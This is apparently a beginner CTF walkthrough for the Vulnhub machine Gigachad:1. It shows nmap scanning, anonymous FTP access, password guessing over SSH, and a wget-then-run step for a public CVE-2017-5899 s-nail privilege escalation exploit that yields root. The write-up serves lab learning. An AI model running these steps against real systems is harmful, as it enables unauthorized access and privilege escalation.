Gigachad : 1 Vulnhub Walkthrough
This is a writeup for the Vulnhub Machine : Gigachad:1 which was released by tasiyanci
Level : Beginner / Intermediate
Goal: Find user flag and root flag
Machine Discovery :
First we will use nmap -sn 192.168.1.0/24 to discover the machine in your network. (I have assigned an IP of 192.168.1.0/24 range to my machine)
Port Scanning:
Once the machine is discovered, we will do a port scan using nmap
nmap -A -T4 -p- 192.168.1.5
Exploiting User Flag:
We discovered three open ports which are FTP(21), SSH (22) and HTTP(80)
We can start by Port 80, but there is nothing on the website
We can see that for FTP, anonymous login is allowed. Hence we will try logging in to FTP
ftp 192.168.1.5
Username will be anonymous and password will be blank(press enter at password prompt)
We will use dir or ls command to view the files. As you can see we have found a file called chadinfo
We will download the file using get command
Now lets open the file using cat
We got the username as chad and for password they have given us the directory /drippinchad.png. Lets check it out
After opening http://192.168.1.5/drippinchad.png in browser, we get the below page
According to the caption the password must be related to the place in the picture. If you know this place then skip the below steps. If you don’t know then we will download the image and do a reverse image lookup on Google
Go to Google Images and the click on the Camera Icon
Now browse the files and insert your image
You will see some links which shows this place
I followed the second link and then found that the name is Maiden’s tower
We had discovered Port 22 (SSH) open so we will login with user chad (which we got from the chadinfo file) and we will guess the password something related to Maiden’s tower
After guessing for sometime, I found that the password is maidenstower
So we will login into SSH with username:chad and password:maidenstower
ssh chad@192.168.1.5
After doing ls we got our user flag user.txt
Exploiting Root Flag:
For escalating privileges, we can try by finding sudo permissions for user chad.
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
After researching the services, I found s-nail service which is used for mails. It also has privilege escalation exploits available with CVE-2017–5899
I used the below Github exploit as the payload
In the Home directory, download the exploit.sh using wget
wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
Now we will give executable permissions to our exploit.sh using chmod
chmod 777 exploit.sh
And then we will run the exploit
./exploit.sh
We will get a Success message and we will get our root shell
Go to /root directory and we got our last flag which is the root flag root.txt !
Thanks for reading! :)
Please let me know if you have any queries or suggestions.